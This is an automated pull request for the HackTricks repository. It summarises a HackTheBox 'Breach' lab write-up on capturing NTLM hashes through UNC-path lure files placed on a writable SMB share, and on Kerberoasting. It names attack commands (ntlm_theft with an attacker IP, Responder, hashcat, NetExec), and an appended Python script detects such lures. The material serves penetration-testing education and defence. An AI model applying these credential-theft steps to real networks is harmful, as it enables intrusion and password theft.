HTB Breach #1878

Merged
carlospolop merged 1 commit into master from update_HTB__Breach_20260210_131041
Feb 12, 2026

@carlospolop
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

  • Blog URL: https://0xdf.gitlab.io/2026/02/10/htb-breach.html
  • Blog Title: HTB: Breach
  • Suggested Section: Windows / Active Directory Methodology -> NTLM -> Places to steal NTLM creds (add subsection: 'Writable SMB share + Explorer-triggered UNC lures (ntlm_theft/SCF/LNK/library-ms/desktop.ini)') and cross-link from 'Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks' and from 'Active Directory Methodology -> Kerberoast' (add NetExec ldap --kerberoast example)

🎯 Content Summary

Title / Target: HackTheBox “Breach” is a Windows Domain Controller running Windows Server 2022 (Build 20348) with hostname BREACHDC in domain breach.vl. The post demonstrates a practical domain compromise path starting from guest SMB write access to NTLM credential interception, then Kerberoasting to recover a service account password. The intro also states the intended endgame chain: silver ticket → MSSQL sysadmin → xp_cmd...

🔧 Technical Details

NTLM capture via writable SMB share lures (UNC-path coercion): If you can write to an SMB share that users/systems browse, drop files whose content references an attacker UNC path (e.g., \\10.10.14.16\share). Windows Explorer rendering (and some file handlers on open) can trigger automatic SMB authentication, producing a NetNTLMv2 challenge/response that tools like Responder can capture. Generate broad lure coverage with ntlm_theft.py -g all -s <attacker_ip> -f <base>, upload via smbclient (mput *), capture with Responder.py -I <iface>, then crack offline with hashcat (NetNTLMv2 autodetects to mode 5600).


Kerberoasting via LDAP (etype 23 TGS cracking): With any valid domain creds, request/collect Kerberos service tickets for SPN-bearing accounts and extract $krb5tgs$23$ material (RC4-HMAC / etype 23) for offline cracking. NetExec can automate extract...

🤖 Agent Actions

Updated HackTricks with new NTLM lure technique and tooling:

  • Added detailed “writable SMB share + Explorer UNC lures” workflow to NTLM credential theft page, including ntlm_theft generation, SMB upload, Responder capture, and cracking guidance, plus reference to Breach blog.
  • Cross-linked LLMNR/NBT-NS/DNS/WPAD relay page to the new lure workflow and added the Breach reference.
  • Enhanced Kerberoast page with NetExec LDAP kerberoast example and cited Breach blog in references.

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.
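
A defender-side check for the lure technique summarized in the comment above, as an added example that is not part of this PR or of HackTricks: it walks a share for the Explorer-parsed file types the summary names and reports any that reference a UNC host outside an allowlist. The function names, the trusted host `fileserver01` and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Explorer-parsed types named in the summary; .url is added here as another shortcut type.
LURE_SUFFIXES = {".scf", ".lnk", ".url", ".library-ms"}
LURE_NAMES = {"desktop.ini"}
# \\host\ followed by the first character of a share name
UNC_RE = re.compile(rb"\\\\([A-Za-z0-9._-]+)\\[^\\]")

def remote_hosts(data: bytes) -> set:
    """Return hosts referenced by UNC paths in ASCII or UTF-16LE content."""
    flat = data.replace(b"\x00", b"")  # collapses UTF-16LE (used inside .lnk) to ASCII
    return {m.group(1).decode("ascii").lower() for m in UNC_RE.finditer(flat)}

def scan_share(root, trusted_hosts):
    """List (file name, untrusted hosts) for shell files pointing outside the trusted set."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for path in sorted(Path(root).rglob("*")):
        is_shell_file = (path.suffix.lower() in LURE_SUFFIXES
                         or path.name.lower() in LURE_NAMES)
        if not (path.is_file() and is_shell_file):
            continue
        untrusted = remote_hosts(path.read_bytes()) - trusted
        if untrusted:
            findings.append((path.name, sorted(untrusted)))
    return findings

def demo():
    """Scan constructed sample files; 192.0.2.10 is a documentation-range address."""
    samples = {
        "@invoice.scf": b"[Shell]\r\nCommand=2\r\nIconFile=\\\\192.0.2.10\\share\\icon.ico\r\n",
        "desktop.ini": b"[.ShellClassInfo]\r\nIconResource=\\\\fileserver01\\icons\\folder.ico,0\r\n",
        "notes.lnk": b"L\x00\x00\x00" + "\\\\192.0.2.10\\share\\a.ico".encode("utf-16-le"),
        "readme.txt": b"see \\\\192.0.2.10\\share for docs",  # not a shell file: skipped
    }
    with tempfile.TemporaryDirectory() as root:
        for name, content in samples.items():
            (Path(root) / name).write_bytes(content)
        return scan_share(root, trusted_hosts=["fileserver01"])

if __name__ == "__main__":
    for name, hosts in demo():
        print(f"{name}: references untrusted UNC host(s) {', '.join(hosts)}")
```

The NUL-stripping step is a heuristic for binary `.lnk` content, so treat hits as leads to review rather than confirmed lures.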

@carlospolop
Collaborator Author

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2026/02/10/htb-breach.html

Content Categories: Based on the analysis, this content was categorized under "Windows / Active Directory Methodology -> NTLM -> Places to steal NTLM creds (add subsection: 'Writable SMB share + Explorer-triggered UNC lures (ntlm_theft/SCF/LNK/library-ms/desktop.ini)') and cross-link from 'Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks' and from 'Active Directory Methodology -> Kerberoast' (add NetExec ldap --kerberoast example)".

Repository Maintenance:

  • MD Files Formatting: 944 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0

@carlospolop
Collaborator Author

merge

@carlospolop carlospolop merged commit a24efb8 into master Feb 12, 2026
@carlospolop carlospolop deleted the update_HTB__Breach_20260210_131041 branch February 12, 2026 16:00